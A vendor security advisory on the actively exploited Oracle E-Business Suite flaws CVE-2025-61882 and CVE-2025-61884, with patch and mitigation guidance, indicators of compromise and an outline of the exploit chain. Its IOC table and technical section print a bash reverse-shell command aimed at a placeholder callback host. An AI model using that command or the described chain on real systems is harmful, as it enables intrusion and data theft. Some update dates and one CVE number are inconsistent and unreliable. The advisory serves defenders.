- October 6, 2025
Critical Vulnerability in Oracle Under Active Exploitation (CVE-2025-61882 & CVE-2025-61884)
On October 4th, Oracle reported a critical zero-day vulnerability in Oracle E-Business Suite (EBS) that is under active exploitation by Cl0p ransomware operators. The vulnerability (tracked as CVE-2025-61882 & CVE-2025-61884) is a critical unauthenticated remote code execution software vulnerability affecting Oracle EBS versions 12.2.3 through 12.2.14, with a CVSS score of 9.8.
Executive Summary
Update August 14th 5:15 PM UTC - Oracle has released a second emergency patch for a new vulnerability, CVE-2025-61884, rated CVSS 7.5, impacting the Runtime UI component of EBS. This flaw is also remotely exploitable without authentication and may allow access to sensitive resources.
While Oracle has not confirmed in-the-wild exploitation, the timing aligns with ongoing Cl0p activity and post-incident investigations across compromised EBS environments.
On October 4th, Oracle reported a critical zero-day vulnerability in Oracle E-Business Suite (EBS) that is under active exploitation by Cl0p ransomware operators. The vulnerability (tracked as CVE-2025-61882) is a critical unauthenticated remote code execution software vulnerability affecting Oracle EBS versions 12.2.3 through 12.2.14, with a CVSS score of 9.8.
The flaw exists in the Oracle Concurrent Processing BI Publisher Integration component of Oracle EBS and if successfully exploited grants unauthenticated attackers remote code execution (RCE) on a target machine without requiring any credentials.
Beazley Security strongly recommends organizations apply available patches for affected Oracle EBS systems and to immediately assess them for potential compromise, given reports of active exploitation by the Cl0p ransomware operators. Indicators of Compromise (IOCs) provided in this advisory can assist in identifying systems that may have been impacted.
Additionally, the public leak of functional exploit code by Scattered Lapsus$ increases accessibility and likelihood other threat actors will begin using the exploit.
Affected Systems or Products
Oracle has released a security alert stating the following Oracle E-Business suite versions are impacted by this vulnerability. Please see the patches section of this document for more details.
Product | Affected | Unaffected |
|---|---|---|
Oracle E-Business Suite | 12.2.3-12.2.14 | Later than 12.2.14 |
Mitigations / Workarounds
Given the active exploitation by Cl0p ransomware operators and public leak of exploit code by a well-known collective of threat actors, Beazley Security strongly recommends organizations apply these updates immediately. Oracle has released emergency patches to remediate this vulnerability, please see the “patches” section below for more information.
If patching cannot be immediately applied, other mitigations may temporarily reduce the risk of exposure:
Restrict public network access to or consider temporary isolation of Oracle EBS systems, especially those using BI Publisher Integration modules due to the severity of this issue.
Deploy Web Application Firewalls (WAF) with signatures that detect exploitation attempts of this vulnerability
Monitor for indicators of attack or compromise. See the “Indicators of Compromise” section in this document for more information
Please note that threat actors claim to have more sophisticated versions of this exploit that require less outbound connectivity from impacted systems. Organizations are strongly advised to apply available patches rather than attempt any temporary mitigations that may not fully address the issue.
Patches
Update August 14th 5:15 PM UTC – Patches for the added vulnerability (CVE-2025-61884) are available here.
Patches are available through Oracle’s Patch Availability Document (requires Oracle login) which provides step-by-step installation instructions tailored to each supported version.
Before applying the patch for CVE-2025-61882, organizations must first ensure that the October 2023 Critical Patch Update (CPU) is installed. The earlier update is a mandatory prerequisite to apply fixes, according to Oracle’s security advisory.
Indicators of Compromise
The table below lists verified Indicators of Compromise tied to active exploitation attempts against Oracle EBS, released by Oracle. They include IP addresses and a command pattern that is consistent with reverse shell behavior as seen in the leaked proof of concept exploit.
Indicator | Type | Description |
|---|---|---|
200[.]107[.]207[.]26 | IP | Potential GET and POST activity |
185[.]181[.]60[.]11 | IP | Potential GET and POST activity |
sh -c /bin/bash -i >& /dev/tcp/<callback IP>/<callback port> 0>&1[FD1] [BV2] | Command | Establish an outbound TCP connection (reverse shell style), hardcoded but replaceable RCE payload found in the PoC |
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
Threat Intelligence
Cl0p Ransomware Campaign
The Cl0p ransomware group has been actively exploiting CVE-2025-61882 as a zero-day vulnerability since August 2025, conducting a sophisticated data theft and extortion campaign targeting Oracle EBS clients. It is believed the group has been identifying vulnerable, internet facing systems and using the now released exploit to gain access to and exfiltrate data.
Starting late September and into October, Cl0p started a widespread email extortion campaign, sending ransom demands through compromised, otherwise legitimate email accounts to increase delivery rates to victims according to Cybereason. The extortion emails purportedly direct victims to visit their public facing data leak site with the group claiming to have stolen ERP data including financial records, HR data, and other customer information.
This campaign mirrors Cl0p’s action in previous high-profile attacks against file transfer solution MOVEit Transfer back in 2023, another campaign that exploited a zero-day vulnerability (CVE-2023-34362) on internet facing enterprise software.
Technical Details
Update August 14th 5:15 PM UTC – CVE-2025-61882 (BI Publisher / Concurrent Processing) and CVE-2025-61884 (Runtime UI) are unauthenticated, remotely exploitable flaws in Oracle EBS that attackers have used independently and in chained sequences to execute commands and access sensitive resources. At time of writing there is no technical details publicly available yet.
CVE-2026-61882 is a critical remote code execution vulnerability that is exploitable without authentication. The flaw exists in Oracle E-Business Suite’s (EBS) concurrent processing product, affecting the BI Publisher Integration component according to the risk matrix provided in Oracle’s related advisory.
This vulnerability is especially dangerous because attackers can exploit it remotely on internet-facing systems without authentication or user involvement.
At the time of this writing, Oracle has not provided details about the flaws and specific exploitation of this vulnerability. However, according to an article released by Rapid7 the exploit was released to the public by the “SCATTERED LAPSUS$” and/or related threat actors, and analysis performed by researcher Johannes Ullrich suggests exploitation may be attributed to a Server-Side Request Forgery (SSRF) issue, following a multi-step process:
The exploit script sends a HTTP GET request to
/OA_HTML/runforms.jspto fingerprint the target system and verify the hostname.A HTTP POST request to
/OA_HTML/JavaScriptServletretrieves a CSRF token required for the final exploitThe exploit request is contained in an HTTP POST to
/OA_HTML/configurator/UiServletThe exploit payload leverages an CLRF injection and an auth bypass to deliver the SSRF payload
The SSRF payload tricks the target machine into retrieving and executing arbitrary commands from an attacker-controlled server (labelled “evil_server” in the leaked PoC code)
The “evil_server” code in the leaked PoC contains the
bash -i >& /dev/tcp/<IP>/<port> 0>&1reverse shell, but this command can be replaced by anything
Beazley Security Labs has acquired and is presently analyzing the Proof of Concept (PoC) exploit. If confirmed, findings consistent with the testing and reporting by Johannes Ullrich suggest that the probable attack vector for CVE-2025-61882 is as outlined below:
Figure 1: CVE-2025-61882 attack chain
How Beazley Security is responding
Beazley Security is monitoring client perimeter devices through our Exposure Management Platform to identify impacted devices and support organizations in remediation of any issues found.
We are also conducting threat hunts across our MDR environment to detect potential exploitation attempts against our clients.
If you believe your organization may have been impacted by this attack campaign and need support, please contact our Incident Response team.